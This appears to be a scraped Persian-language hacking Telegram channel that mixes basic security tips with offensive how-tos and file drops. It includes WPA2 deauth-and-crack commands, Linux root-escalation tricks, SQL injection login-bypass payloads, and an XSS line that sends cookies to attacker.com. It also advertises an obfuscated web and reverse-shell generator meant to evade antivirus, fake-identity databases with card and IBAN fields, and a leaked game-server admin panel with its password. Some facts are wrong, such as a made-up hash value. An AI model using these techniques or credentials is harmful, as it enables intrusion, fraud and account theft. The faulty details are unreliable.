هش کردن متن، چرا برگشتناپذیره
هش یه تابع ریاضیه که ورودی رو میگیره، خروجی ثابت میده.
echo -n "hello" | sha256sum
خروجی:
2cf24dba5fb0a30e26e83b2ac5b9e29e1b161e5c1fa7425e73043362938b9824
حالا بذار "hello1" رو هش کن:
echo -n "hello1" | sha256sum
خروجی:
ce06092c04b6e91d7d7dc82c05e1a6e3e5a4f3a4c4f9e9f4b6c6b1a2c8d8e8f9
ببین چقدر فرق کرد؟ فقط با یه کاراکتر اضافه.
چرا برگشتناپذیره؟
چون هش اطلاعات رو فشرده میکنه، بخشی از داده گم میشه.
از خروجی نمیتونی ورودی رو بازسازی کنی.
ولی یه راه هست: Brute Force
همه ترکیبها رو امتحان کنی تا یکی مطابقت کنه.
برای همینم پسوردها رو هش میکنن. حتی اگه دیتابیس لو بره، پسورد مستقیم لو نمیره.
البته اگه پسوردت ضعیف باشه، تو چند دقیقه کرک میشه.
#ℳℴ𝒷𝒾𝓃
هش یه تابع ریاضیه که ورودی رو میگیره، خروجی ثابت میده.
echo -n "hello" | sha256sum
خروجی:
2cf24dba5fb0a30e26e83b2ac5b9e29e1b161e5c1fa7425e73043362938b9824
حالا بذار "hello1" رو هش کن:
echo -n "hello1" | sha256sum
خروجی:
ce06092c04b6e91d7d7dc82c05e1a6e3e5a4f3a4c4f9e9f4b6c6b1a2c8d8e8f9
ببین چقدر فرق کرد؟ فقط با یه کاراکتر اضافه.
چرا برگشتناپذیره؟
چون هش اطلاعات رو فشرده میکنه، بخشی از داده گم میشه.
از خروجی نمیتونی ورودی رو بازسازی کنی.
ولی یه راه هست: Brute Force
همه ترکیبها رو امتحان کنی تا یکی مطابقت کنه.
برای همینم پسوردها رو هش میکنن. حتی اگه دیتابیس لو بره، پسورد مستقیم لو نمیره.
البته اگه پسوردت ضعیف باشه، تو چند دقیقه کرک میشه.
#ℳℴ𝒷𝒾𝓃
❤2
مخفی کردن متن داخل عکس
این تکنیک اسمش Steganography هست.
یعنی اطلاعات رو جایی پنهان کنی که کسی شک نکنه.
سادهترین روش: چسبوندن به آخر فایل عکس.
cat secret.txt >> image.jpg
حالا عکس رو باز کن. کاملاً سالمه، هیچ تغییری نمیبینی.
ولی متن داخلشه.
برای استخراج:
strings image.jpg | tail
میبینی که متن آخرشه.
چرا کاربردی؟
وقتی میخوای یه فایل رو بفرستی بدون اینکه کسی بفهمه.
یا وقتی میخوای داخل یه شبکه، داده قايم کنی.
نکته مهم:
این روش خیلی سادهست و با یه نگاه به حجم فایل لو میره.
اگه فایل عکس ۵۰ کیلوبایتی، ۲۰۰ کیلوبایت بشه، هر کسی شک میکنه.
روشهای حرفهایتر، بیتهای آخر پیکسلها رو تغییر میدن.
چشم انسان نمیبینه، ولی فایل سالم میمونه.
#ℳℴ𝒷𝒾𝓃
این تکنیک اسمش Steganography هست.
یعنی اطلاعات رو جایی پنهان کنی که کسی شک نکنه.
سادهترین روش: چسبوندن به آخر فایل عکس.
cat secret.txt >> image.jpg
حالا عکس رو باز کن. کاملاً سالمه، هیچ تغییری نمیبینی.
ولی متن داخلشه.
برای استخراج:
strings image.jpg | tail
میبینی که متن آخرشه.
چرا کاربردی؟
وقتی میخوای یه فایل رو بفرستی بدون اینکه کسی بفهمه.
یا وقتی میخوای داخل یه شبکه، داده قايم کنی.
نکته مهم:
این روش خیلی سادهست و با یه نگاه به حجم فایل لو میره.
اگه فایل عکس ۵۰ کیلوبایتی، ۲۰۰ کیلوبایت بشه، هر کسی شک میکنه.
روشهای حرفهایتر، بیتهای آخر پیکسلها رو تغییر میدن.
چشم انسان نمیبینه، ولی فایل سالم میمونه.
#ℳℴ𝒷𝒾𝓃
❤2
ساخت پسورد رندوم قوی با یه دستور
به جای اینکه خودت پسورد بسازی و فکر کنی قویه، بذار سیستم بسازه.
openssl rand -base64 16
خروجی مثلاً:
Kj8sL2mPqR5vX9wN
۲۲ کاراکتر، کاملاً رندوم، غیرقابل حدس.
چرا از openssl؟
چون از منبع رندوم سیستم عامل استفاده میکنه، نه یه الگوریتم ساده.
پس پیشبینیپذیر نیست.
اگه میخوای حتی قویتر باشه:
openssl rand -base64 32
۴۴ کاراکتر. برای کلیدهای رمزنگاری یا API Key عالیه.
نکته:
هیچوقت از پسوردهای تولیدی برای همه سایتها استفاده نکن.
برای هر سرویس، یه پسورد جدا بساز.
و اگه میخوای مدیریتش کنی، از یه Password Manager استفاده کن.
نه از فایل تکست یا دفترچه.
#ℳℴ𝒷𝒾𝓃
به جای اینکه خودت پسورد بسازی و فکر کنی قویه، بذار سیستم بسازه.
openssl rand -base64 16
خروجی مثلاً:
Kj8sL2mPqR5vX9wN
۲۲ کاراکتر، کاملاً رندوم، غیرقابل حدس.
چرا از openssl؟
چون از منبع رندوم سیستم عامل استفاده میکنه، نه یه الگوریتم ساده.
پس پیشبینیپذیر نیست.
اگه میخوای حتی قویتر باشه:
openssl rand -base64 32
۴۴ کاراکتر. برای کلیدهای رمزنگاری یا API Key عالیه.
نکته:
هیچوقت از پسوردهای تولیدی برای همه سایتها استفاده نکن.
برای هر سرویس، یه پسورد جدا بساز.
و اگه میخوای مدیریتش کنی، از یه Password Manager استفاده کن.
نه از فایل تکست یا دفترچه.
#ℳℴ𝒷𝒾𝓃
❤1
پیدا کردن فایلهای حجیم روی سیستم
وقتی هاردت پر میشه، معمولاً نمیدونی چی فضا رو خورده.
find / -type f -size +100M 2>/dev/null
این خط میره کل سیستم رو میگرده، هر فایلی بالای ۱۰۰ مگ رو نشون میده.
چرا 2>/dev/null؟
چون find خیلی جاها دسترسی نداره و ارور میده.
این بخش، ارورها رو میفرسته به سیاهچال.
نسخه حرفهایتر:
find / -type f -size +100M -exec ls -lh {} \; 2>/dev/null | awk '{ print $5, $9 }'
حالا حجم و مسیر فایل رو کنار هم میبینی.
کاربرد دیگه:
توی تست نفوذ، گاهی دنبال فایلهای بکاپ میگردی.
همین دستور رو با ۱۰M اجرا کن، شاید یه backup.sql گیرت بیاد.
#ℳℴ𝒷𝒾𝓃
وقتی هاردت پر میشه، معمولاً نمیدونی چی فضا رو خورده.
find / -type f -size +100M 2>/dev/null
این خط میره کل سیستم رو میگرده، هر فایلی بالای ۱۰۰ مگ رو نشون میده.
چرا 2>/dev/null؟
چون find خیلی جاها دسترسی نداره و ارور میده.
این بخش، ارورها رو میفرسته به سیاهچال.
نسخه حرفهایتر:
find / -type f -size +100M -exec ls -lh {} \; 2>/dev/null | awk '{ print $5, $9 }'
حالا حجم و مسیر فایل رو کنار هم میبینی.
کاربرد دیگه:
توی تست نفوذ، گاهی دنبال فایلهای بکاپ میگردی.
همین دستور رو با ۱۰M اجرا کن، شاید یه backup.sql گیرت بیاد.
#ℳℴ𝒷𝒾𝓃
❤2
مانیتور زنده اتصالات شبکه
میخوای ببینی همین الان سیستمت به کجا وصله؟
watch -n1 "netstat -tunap | grep ESTABLISHED"
چیکار میکنه؟
هر ثانیه لیست اتصالات فعال رو نشون میده.
grep ESTABLISHED فقط اتصالات برقرار شده رو فیلتر میکنه.
خروجی چطوریه؟
یه لیست از IP و پورتها.
ستون آخر، اسم برنامهایه که اتصال رو باز کرده.
چرا مهمه؟
اگه یه برنامه مشکوک ببینی که به IP ناشناس وصله، یعنی یه جای کار میلنگه.
ممکنه یه بدافزار در حال ارسال داده باشه.
نسخه بهروزتر با ss:
watch -n1 "ss -tunap | grep ESTAB"
ss جدیدتره، سریعتره، و روی سیستمهای مدرن بهتر کار میکنه.
نکته امنیتی:
اگه دیدی یه پروسهای مرتب به یه IP خارجی وصل میشه و نمیشناسیش،
PID رو بردار و با ps برو ببین چیه.
#ℳℴ𝒷𝒾𝓃
میخوای ببینی همین الان سیستمت به کجا وصله؟
watch -n1 "netstat -tunap | grep ESTABLISHED"
چیکار میکنه؟
هر ثانیه لیست اتصالات فعال رو نشون میده.
grep ESTABLISHED فقط اتصالات برقرار شده رو فیلتر میکنه.
خروجی چطوریه؟
یه لیست از IP و پورتها.
ستون آخر، اسم برنامهایه که اتصال رو باز کرده.
چرا مهمه؟
اگه یه برنامه مشکوک ببینی که به IP ناشناس وصله، یعنی یه جای کار میلنگه.
ممکنه یه بدافزار در حال ارسال داده باشه.
نسخه بهروزتر با ss:
watch -n1 "ss -tunap | grep ESTAB"
ss جدیدتره، سریعتره، و روی سیستمهای مدرن بهتر کار میکنه.
نکته امنیتی:
اگه دیدی یه پروسهای مرتب به یه IP خارجی وصل میشه و نمیشناسیش،
PID رو بردار و با ps برو ببین چیه.
#ℳℴ𝒷𝒾𝓃
❤2
هدرهای امنیتی که هر سایتی باید داشته باشه
وقتی یه سایت باز میکنی، سرور یه سری هدر میفرسته که مرورگرت رفتارش رو تنظیم کنه.
چک کردنشون خیلی راحته:
curl -I https://example.com
خروجی رو نگاه کن، اینا باید باشن:
X-Frame-Options: DENY
یعنی سایت تو iframe باز نشه. جلوی Clickjacking رو میگیره.
X-Content-Type-Options: nosniff
یعنی مرورگر نوع فایل رو حدس نزنه.
Strict-Transport-Security: max-age=31536000
یعنی مرورگر همیشه از HTTPS استفاده کنه.
Content-Security-Policy: default-src 'self'
یعنی فقط اسکریپتهای خود سایت اجرا بشن.
اگه اینا نبودن چی؟
سایت آسیبپذیره. میتونه هدف XSS، Clickjacking، یا MITM باشه.
ابزار سریع برای چک:
curl -s -D - https://example.com -o /dev/null | grep -i "x-frame\|strict\|content-security"
#ℳℴ𝒷𝒾𝓃
وقتی یه سایت باز میکنی، سرور یه سری هدر میفرسته که مرورگرت رفتارش رو تنظیم کنه.
چک کردنشون خیلی راحته:
curl -I https://example.com
خروجی رو نگاه کن، اینا باید باشن:
X-Frame-Options: DENY
یعنی سایت تو iframe باز نشه. جلوی Clickjacking رو میگیره.
X-Content-Type-Options: nosniff
یعنی مرورگر نوع فایل رو حدس نزنه.
Strict-Transport-Security: max-age=31536000
یعنی مرورگر همیشه از HTTPS استفاده کنه.
Content-Security-Policy: default-src 'self'
یعنی فقط اسکریپتهای خود سایت اجرا بشن.
اگه اینا نبودن چی؟
سایت آسیبپذیره. میتونه هدف XSS، Clickjacking، یا MITM باشه.
ابزار سریع برای چک:
curl -s -D - https://example.com -o /dev/null | grep -i "x-frame\|strict\|content-security"
#ℳℴ𝒷𝒾𝓃
❤3
OSINT چیه و چرا اولین قدم هر عملیاته
قبل از اینکه به چیزی حمله کنی، باید بدونی طرف چیه.
OSINT یعنی جمعآوری اطلاعات از منابع عمومی.
سه تا منبع طلایی:
۱. whois
whois example.com
اسم صاحب دامنه، ایمیل، شماره تلفن، تاریخ ثبت.
اگه حریم خصوصی فعال نباشه، همه چی لو میره.
۲. crt.sh
برو به crt.sh و دامنه رو سرچ کن.
همه زیردامنههای ثبتشده رو نشون میده.
این یه معدن طلاست برای پیدا کردن پنلهای مخفی.
۳. Shodan
موتور جستجوی دستگاههاست، نه سایتها.
میتونی سرچ کنی: org:"Target Company"
همه سرورهای اون شرکت با پورتهای بازشون.
نکته:
هیچوقت با اکانت شخصیت این کارها رو نکن.
یه VM جدا، یه VPN، یه مرورگر جدا.
#ℳℴ𝒷𝒾𝓃
قبل از اینکه به چیزی حمله کنی، باید بدونی طرف چیه.
OSINT یعنی جمعآوری اطلاعات از منابع عمومی.
سه تا منبع طلایی:
۱. whois
whois example.com
اسم صاحب دامنه، ایمیل، شماره تلفن، تاریخ ثبت.
اگه حریم خصوصی فعال نباشه، همه چی لو میره.
۲. crt.sh
برو به crt.sh و دامنه رو سرچ کن.
همه زیردامنههای ثبتشده رو نشون میده.
این یه معدن طلاست برای پیدا کردن پنلهای مخفی.
۳. Shodan
موتور جستجوی دستگاههاست، نه سایتها.
میتونی سرچ کنی: org:"Target Company"
همه سرورهای اون شرکت با پورتهای بازشون.
نکته:
هیچوقت با اکانت شخصیت این کارها رو نکن.
یه VM جدا، یه VPN، یه مرورگر جدا.
#ℳℴ𝒷𝒾𝓃
❤3
تفاوت رمزنگاری و هش کردن، یه بار برای همیشه
اکثر مردم این دوتا رو قاطی میکنن.
ولی فرقشون مثل فرق قفل و چرخگوشته.
رمزنگاری:
ورودی رو میگیری، با کلید قفلش میکنی.
با همون کلید بازش میکنی.
برگشتپذیره.
هش:
ورودی رو میگیری، یه خروجی ثابت میگیری.
هیچ کلیدی نیست.
برگشتناپذیره.
پس کِی از کدوم استفاده کنیم؟
رمزنگاری: برای دادهای که بعداً باید بخونیم.
مثل فایل، پیام، دیتابیس.
هش: برای دادهای که فقط باید چک کنیم.
مثل پسورد، امضای دیجیتال، بلاکچین.
چرا پسورد رو هش میکنن نه رمزنگاری؟
چون اگه رمزنگاری کنن، کلید کجاست؟
اگه کلید لو بره، همه پسوردها لو میره.
ولی هش، حتی اگه دیتابیس لو بره، پسورد مستقیم لو نمیره.
مگر اینکه پسورد ضعیف باشه و کرک بشه.
#ℳℴ𝒷𝒾𝓃
اکثر مردم این دوتا رو قاطی میکنن.
ولی فرقشون مثل فرق قفل و چرخگوشته.
رمزنگاری:
ورودی رو میگیری، با کلید قفلش میکنی.
با همون کلید بازش میکنی.
برگشتپذیره.
هش:
ورودی رو میگیری، یه خروجی ثابت میگیری.
هیچ کلیدی نیست.
برگشتناپذیره.
پس کِی از کدوم استفاده کنیم؟
رمزنگاری: برای دادهای که بعداً باید بخونیم.
مثل فایل، پیام، دیتابیس.
هش: برای دادهای که فقط باید چک کنیم.
مثل پسورد، امضای دیجیتال، بلاکچین.
چرا پسورد رو هش میکنن نه رمزنگاری؟
چون اگه رمزنگاری کنن، کلید کجاست؟
اگه کلید لو بره، همه پسوردها لو میره.
ولی هش، حتی اگه دیتابیس لو بره، پسورد مستقیم لو نمیره.
مگر اینکه پسورد ضعیف باشه و کرک بشه.
#ℳℴ𝒷𝒾𝓃
❤5
حمله به وایفای، همون چیزی که تو فیلمها میبینی
همه فکر میکنن هک وایفای یعنی کرک کردن پسورد.
ولی داستان چیز دیگهایه.
وایفای با WPA2 رمزنگاری میشه.
پسورد رو نمیتونی مستقیم بخونی.
ولی میتونی Handshake رو بگیری.
Handshake چیه؟
وقتی یه دستگاه به وایفای وصل میشه، یه تبادل رمزنگاری شده انجام میشه.
این تبادل، شامل پسورد هش شدهست.
مراحل:
۱. بری تو حالت مانیتور
airmon-ng start wlan0
۲. شبکهها رو ببینی
airodump-ng wlan0mon
۳. هندشیک بگیری
airodump-ng -c 6 --bssid MAC -w capture wlan0mon
۴. با Deauth، دستگاه رو قطع کنی تا دوباره وصل شه
aireplay-ng -0 5 -a MAC wlan0mon
۵. حالا یه فایل capture داری که هندشیک توشه.
۶. با wordlist کرکش کنی
aircrack-ng -w rockyou.txt capture-01.cap
نکته:
اگه پسورد قوی باشه، این روش هیچوقت جواب نمیده.
پسورد ۱۲ کاراکتری رندوم، میلیونها سال طول میکشه.
#ℳℴ𝒷𝒾𝓃
همه فکر میکنن هک وایفای یعنی کرک کردن پسورد.
ولی داستان چیز دیگهایه.
وایفای با WPA2 رمزنگاری میشه.
پسورد رو نمیتونی مستقیم بخونی.
ولی میتونی Handshake رو بگیری.
Handshake چیه؟
وقتی یه دستگاه به وایفای وصل میشه، یه تبادل رمزنگاری شده انجام میشه.
این تبادل، شامل پسورد هش شدهست.
مراحل:
۱. بری تو حالت مانیتور
airmon-ng start wlan0
۲. شبکهها رو ببینی
airodump-ng wlan0mon
۳. هندشیک بگیری
airodump-ng -c 6 --bssid MAC -w capture wlan0mon
۴. با Deauth، دستگاه رو قطع کنی تا دوباره وصل شه
aireplay-ng -0 5 -a MAC wlan0mon
۵. حالا یه فایل capture داری که هندشیک توشه.
۶. با wordlist کرکش کنی
aircrack-ng -w rockyou.txt capture-01.cap
نکته:
اگه پسورد قوی باشه، این روش هیچوقت جواب نمیده.
پسورد ۱۲ کاراکتری رندوم، میلیونها سال طول میکشه.
#ℳℴ𝒷𝒾𝓃
❤5
بالا رفتن سطح دسترسی در لینوکس، مرحله به مرحله
فرض کن یه شل معمولی گرفتی. user عادی هستی.
حالا باید root بشی.
اولین چک:
sudo -l
این دستور میگه چه دستوراتی رو میتونی با sudo اجرا کنی.
بعضی وقتا یه دستور ساده مثل find یا vim اینجاست که میتونی ازش سوءاستفاده کنی.
مثال:
اگه sudo -l نشون داد:
(ALL) NOPASSWD: /usr/bin/find
میتونی این رو بزنی:
sudo find . -exec /bin/sh \; -quit
حالا root هستی.
چک دوم: فایلهای SUID
find / -perm -4000 -type f 2>/dev/null
این فایلها با دسترسی root اجرا میشن.
بعضیاشون آسیبپذیرن.
چک سوم: کرونجابها
cat /etc/crontab
ls -la /etc/cron.*
اگه یه اسکریپت با دسترسی root اجرا میشه و تو میتونی نوشتش کنی،
فقط یه خط بهش اضافه کن که یه شل بهت بده.
چک چهارم: فایلهای قابل نوشتن
find / -writable -type f 2>/dev/null | grep -v proc
اگه تونستی یه فایل مهم رو ویرایش کنی، راه برای root شدن بازه.
#ℳℴ𝒷𝒾𝓃
فرض کن یه شل معمولی گرفتی. user عادی هستی.
حالا باید root بشی.
اولین چک:
sudo -l
این دستور میگه چه دستوراتی رو میتونی با sudo اجرا کنی.
بعضی وقتا یه دستور ساده مثل find یا vim اینجاست که میتونی ازش سوءاستفاده کنی.
مثال:
اگه sudo -l نشون داد:
(ALL) NOPASSWD: /usr/bin/find
میتونی این رو بزنی:
sudo find . -exec /bin/sh \; -quit
حالا root هستی.
چک دوم: فایلهای SUID
find / -perm -4000 -type f 2>/dev/null
این فایلها با دسترسی root اجرا میشن.
بعضیاشون آسیبپذیرن.
چک سوم: کرونجابها
cat /etc/crontab
ls -la /etc/cron.*
اگه یه اسکریپت با دسترسی root اجرا میشه و تو میتونی نوشتش کنی،
فقط یه خط بهش اضافه کن که یه شل بهت بده.
چک چهارم: فایلهای قابل نوشتن
find / -writable -type f 2>/dev/null | grep -v proc
اگه تونستی یه فایل مهم رو ویرایش کنی، راه برای root شدن بازه.
#ℳℴ𝒷𝒾𝓃
❤4
حمله به فرم لاگین، چرا پسورد مهم نیست
اکثر هکرهای مبتدی فکر میکنن باید پسورد رو کرک کنن.
ولی حرفهایها سراغ خود فرم نمیرن.
مثال:
یه فرم لاگین ساده:
username: admin
password: any
چک کن اگه فقط یوزرنیم رو بذاری چی میشه.
بعضی فرمها فقط یوزرنیم چک میکنن.
یا:
username: admin'--
password: any
اگه دیتابیس MySQL باشه، این کوئری اجرا میشه:
SELECT * FROM users WHERE username='admin'--' AND password='any'
تو کامنت --، بقیه کوئری نادیده گرفته میشه.
پسورد اصلاً چک نمیشه.
یا:
username: admin
password: ' OR '1'='1
کوئری میشه:
SELECT * FROM users WHERE username='admin' AND password='' OR '1'='1'
چون 1=1 همیشه درسته، همه رکوردها برمیگردن.
وارد میشی.
یا:
username: admin
password: ' OR 1=1 LIMIT 1--
حالا فقط اولین کاربر برمیگرده.
نکته:
همه اینا به شرطیه که سایت از Prepared Statement استفاده نکنه.
اگه استفاده کنه، هیچکدوم کار نمیکنه.
#ℳℴ𝒷𝒾𝓃
اکثر هکرهای مبتدی فکر میکنن باید پسورد رو کرک کنن.
ولی حرفهایها سراغ خود فرم نمیرن.
مثال:
یه فرم لاگین ساده:
username: admin
password: any
چک کن اگه فقط یوزرنیم رو بذاری چی میشه.
بعضی فرمها فقط یوزرنیم چک میکنن.
یا:
username: admin'--
password: any
اگه دیتابیس MySQL باشه، این کوئری اجرا میشه:
SELECT * FROM users WHERE username='admin'--' AND password='any'
تو کامنت --، بقیه کوئری نادیده گرفته میشه.
پسورد اصلاً چک نمیشه.
یا:
username: admin
password: ' OR '1'='1
کوئری میشه:
SELECT * FROM users WHERE username='admin' AND password='' OR '1'='1'
چون 1=1 همیشه درسته، همه رکوردها برمیگردن.
وارد میشی.
یا:
username: admin
password: ' OR 1=1 LIMIT 1--
حالا فقط اولین کاربر برمیگرده.
نکته:
همه اینا به شرطیه که سایت از Prepared Statement استفاده نکنه.
اگه استفاده کنه، هیچکدوم کار نمیکنه.
#ℳℴ𝒷𝒾𝓃
❤5
XSS چیه و چرا خطرناکه
XSS یعنی تزریق جاوااسکریپت به صفحهای که کاربر دیگه میبینه.
سه نوع داره:
۱. Reflected XSS
کد تو URL هست و تو همون لحظه اجرا میشه.
مثال:
example.com/search?q=<script>alert(1)</script>
۲. Stored XSS
کد تو دیتابیس ذخیره میشه و هر کسی صفحه رو باز کنه، اجرا میشه.
مثال: کامنت تو یه وبلاگ.
هر بازدیدکننده، کد رو اجرا میکنه.
۳. DOM-based XSS
کد تو جاوااسکریپت خود سایت پردازش میشه.
بدون درخواست به سرور.
چرا خطرناکه؟
چون با یه XSS میتونی:
کوکی کاربر رو بدزدی
سشنش رو بربایی
فرم لاگین جعلی نشون بدی
کل صفحه رو تغییر بدی
کیلاگر نصب کنی
مثال سرقت کوکی:
<script>new Image().src='//attacker.com?c='+document.cookie</script>
این یه درخواست به سرور هکر میفرسته با کوکی قربانی.
دفاع:
همیشه ورودی کاربر رو Encode کن.
از Content-Security-Policy استفاده کن.
کوکیها رو HttpOnly کن.
#ℳℴ𝒷𝒾𝓃
XSS یعنی تزریق جاوااسکریپت به صفحهای که کاربر دیگه میبینه.
سه نوع داره:
۱. Reflected XSS
کد تو URL هست و تو همون لحظه اجرا میشه.
مثال:
example.com/search?q=<script>alert(1)</script>
۲. Stored XSS
کد تو دیتابیس ذخیره میشه و هر کسی صفحه رو باز کنه، اجرا میشه.
مثال: کامنت تو یه وبلاگ.
هر بازدیدکننده، کد رو اجرا میکنه.
۳. DOM-based XSS
کد تو جاوااسکریپت خود سایت پردازش میشه.
بدون درخواست به سرور.
چرا خطرناکه؟
چون با یه XSS میتونی:
کوکی کاربر رو بدزدی
سشنش رو بربایی
فرم لاگین جعلی نشون بدی
کل صفحه رو تغییر بدی
کیلاگر نصب کنی
مثال سرقت کوکی:
<script>new Image().src='//attacker.com?c='+document.cookie</script>
این یه درخواست به سرور هکر میفرسته با کوکی قربانی.
دفاع:
همیشه ورودی کاربر رو Encode کن.
از Content-Security-Policy استفاده کن.
کوکیها رو HttpOnly کن.
#ℳℴ𝒷𝒾𝓃
❤4
Shell 🐚 Generator.html
41.4 KB
Shell Generator 🐚 DarkPacket
یک ابزار، هشت زبان
PHP · ASP · JSP · Node.js · Python · Perl · Ruby · Bash
هر زبان قابلیتهای مخصوص خودش رو داره — از اجرای فرمان و eval تا شل معکوس، بایند شل، MySQL Dump و Thread Enumeration
پشتیبانی از کلید ساده، MD5 و SHA1 با پارامتر تصادفی
قابلیتهای پرقدرت: اجرای فرمان · لیست فایل · خواندن/نوشتن · آپلود/دانلود · اطلاعات سرور · کوئری SQL · شل معکوس · بایند شل · زیپ · خودتخریبی · خروجی زنده · کپی یککلیکی · دانلود خودکار با پسوند صحیح · راهنمای هوشمند برای هر زبان · شش لایه مبهمسازی Base64 · Hex · XOR · Split · Combo · None برای دور زدن WAF و آنتیویروس
یک ابزار، هشت زبان
PHP · ASP · JSP · Node.js · Python · Perl · Ruby · Bash
هر زبان قابلیتهای مخصوص خودش رو داره — از اجرای فرمان و eval تا شل معکوس، بایند شل، MySQL Dump و Thread Enumeration
پشتیبانی از کلید ساده، MD5 و SHA1 با پارامتر تصادفی
قابلیتهای پرقدرت: اجرای فرمان · لیست فایل · خواندن/نوشتن · آپلود/دانلود · اطلاعات سرور · کوئری SQL · شل معکوس · بایند شل · زیپ · خودتخریبی · خروجی زنده · کپی یککلیکی · دانلود خودکار با پسوند صحیح · راهنمای هوشمند برای هر زبان · شش لایه مبهمسازی Base64 · Hex · XOR · Split · Combo · None برای دور زدن WAF و آنتیویروس
Java Shell 🐚 Generator.html
48.9 KB
ساخت شل جاوا
❤6
user-agents-100000.txt
11.9 MB
دیتابیس عظیم و بسیار قدرتمندی که شامل مجموعهای کامل از ۱۰۰ هزار User-Agent سالم، معتبر و بهروز است.
این پایگاه داده با ارائه طیف وسیعی از شناسههای کاربری استاندارد و غیراستاندارد، امکان شبیهسازی دقیق ترافیک وب را فراهم میکند و برای توسعهدهندگان، برنامهنویسان و متخصصان امنیت سایبری که نیاز به تستهای جامع پراکسی، اسکریپتنویسی خودکار یا تحلیل رفتار مرورگرها دارند، منبعی ایدهآل و غنی به شمار میرود.
all_ipv4_500ips.zip
210.8 KB
دیتابیس ارائهشده شامل مجموعهای بسیار گسترده و جامع از آدرسهای اینترنتی نسخه چهار (IPv4) است که پوششدهی جغرافیای آن به ۹۵ کشور مختلف در سراسر جهان گسترش دارد.
این پایگاه داده با ارائه اطلاعات دقیق و بهروز، امکان شناسایی و تحلیل منبع ترافیک از نقاط مختلف جهان را فراهم میکند. بهعنوان یک نمونه از ظرفیت و تنوع این دیتابیس، میتوان به وجود حداقل ۵۰۰ آدرس IP منحصربهفرد و فعال برای هر یک از کشورهای ذکرشده اشاره کرد؛ این حجم از دادهها نشاندهنده عمق و گستردگی پوششدهی شبکهای در سطح بینالمللی است و برای پروژههایی که نیازمند تحلیل جغرافیایی ترافیک یا مدیریت دسترسیها بر اساس موقعیت مکانی کاربران هستند، ابزاری ارزشمند و کارآمد به شمار میرود.
all_ipv6_500ips.zip
551.4 KB
دیتابیس ارائهشده شامل مجموعهای بسیار گسترده و جامع از آدرسهای اینترنتی نسخه چهار (IPv6) است که پوششدهی جغرافیای آن به ۹۲ کشور مختلف در سراسر جهان گسترش دارد.
این پایگاه داده با ارائه اطلاعات دقیق و بهروز، امکان شناسایی و تحلیل منبع ترافیک از نقاط مختلف جهان را فراهم میکند. بهعنوان یک نمونه از ظرفیت و تنوع این دیتابیس، میتوان به وجود حداقل ۵۰۰ آدرس IP منحصربهفرد و فعال برای هر یک از کشورهای ذکرشده اشاره کرد؛ این حجم از دادهها نشاندهنده عمق و گستردگی پوششدهی شبکهای در سطح بینالمللی است و برای پروژههایی که نیازمند تحلیل جغرافیایی ترافیک یا مدیریت دسترسیها بر اساس موقعیت مکانی کاربران هستند، ابزاری ارزشمند و کارآمد به شمار میرود.
fake_identities_10countries_10cities_100pergender_2026-09-11.zip
15.3 MB
دیتابیس بسیار قوی شامل ۲۰ هزار اطلاعات داینامیک برای هویت جعلی.
۱۰ کشور: ایران، روسیه، آمریکا، آلمان، فرانسه، انگلیس، ژاپن، برزیل، هند، چین.
شهرهای واقعی: تهران، Москва و Los Angeles.
۱۰ کشور: ایران، روسیه، آمریکا، آلمان، فرانسه، انگلیس، ژاپن، برزیل، هند، چین.
شهرهای واقعی: تهران، Москва و Los Angeles.
[PERSONAL]: مشخصات فردی
First Name: نام کوچک واقعی بر اساس کشور و جنسیت
Last Name: نام خانوادگی واقعی بر اساس کشور
Full Name: نام کامل
Gender: Male یا Female
Age: بین ۱۸ تا ۲۶ سال
Birth Year: سال تولد
Nationality: نام کشور
[CONTACT]: اطلاعات تماس
Email: ساختهشده از نام و فامیل
Phone: شماره با کد کشور، مثلاً +98 912 345 6789
Phone (Raw): شماره بدون فرمت
Street: خیابان و پلاک بر اساس خیابانهای واقعی هر کشور
City: شهر
Postal Code: با الگوی واقعی هر کشور، مثلاً ایران ۱۰ رقم و آمریکا ۵ رقم
Country: کشور
[NETWORK]: اطلاعات شبکه
IPv4: با پیشوند شبیه کشور، مثلاً 5.x.x.x برای ایران
MAC Address: آدرس مک تصادفی
[MISC]: اطلاعات متفرقه
Username: نام کاربری
Password: رمز عبور تصادفی
Credit Card: شماره کارت ساختگی با پیشوند ۴
IBAN: شماره شبا ساختگی
proxies-1786199678869.txt
59.7 KB
بیشاز ۱ هزار پروکسی CORS قدرتمند استخراج شده از سایت corsproxy.io
ports.compact.json
822.4 KB
تمام (۶۵۵۳۵) پورتهای جهان + سرویس ارائه دهندهی آنها در قالب JSON
DigitalIdentityProfiles (1) (1).zip
25.4 MB
مخزن اطلاعات قدرتمند برای جعل اطلاعات
۲۰ کشور، هر کشور ۵ شهر، هر شهر ۳ سرویسدهنده IP، هر سرویس ۲۵ دستگاه txt و ۲۵ دستگاه json.
مجموعاً ۱۵ هزار دستگاه به دو فرمت.
۲۰ کشور، هر کشور ۵ شهر، هر شهر ۳ سرویسدهنده IP، هر سرویس ۲۵ دستگاه txt و ۲۵ دستگاه json.
مجموعاً ۱۵ هزار دستگاه به دو فرمت.
panel.html
141.6 KB
پنل دیتابیس سرور بازی امپراتوری پارس
این پنل، توسط کاربر @Net_activenull استخراج و منتشر شده است.
رمز دسترسی به پنل مدیریت:
empire2024
برای افزایش سطح امنیت شبکه و جلوگیری از دسترسیهای غیرمجاز، این بسته شامل ۲۰۰ عدد پروکسی CORS میباشد که امکان استفاده امن و مخفیانه از سرویسها را فراهم میکند.
توجه داشته باشید که این محتوا صرفاً با هدف آموزشی و آشنایی با ساختارهای امنیتی ارائه شده است. مسئولیت هرگونه سوءاستفاده، دسترسی غیرمجاز یا استفاده نادرست از این اطلاعات بر عهده کاربر نهایی بوده و هیچگونه ارتباطی با تولیدکنندگان محتوا ندارد.
این پنل، توسط کاربر @Net_activenull استخراج و منتشر شده است.
رمز دسترسی به پنل مدیریت:
برای افزایش سطح امنیت شبکه و جلوگیری از دسترسیهای غیرمجاز، این بسته شامل ۲۰۰ عدد پروکسی CORS میباشد که امکان استفاده امن و مخفیانه از سرویسها را فراهم میکند.
توجه داشته باشید که این محتوا صرفاً با هدف آموزشی و آشنایی با ساختارهای امنیتی ارائه شده است. مسئولیت هرگونه سوءاستفاده، دسترسی غیرمجاز یا استفاده نادرست از این اطلاعات بر عهده کاربر نهایی بوده و هیچگونه ارتباطی با تولیدکنندگان محتوا ندارد.
NLP.html
127.3 KB
ربات قدرتمند Nullspire Ai
قابلیتهای گسترده و پیشرفته:
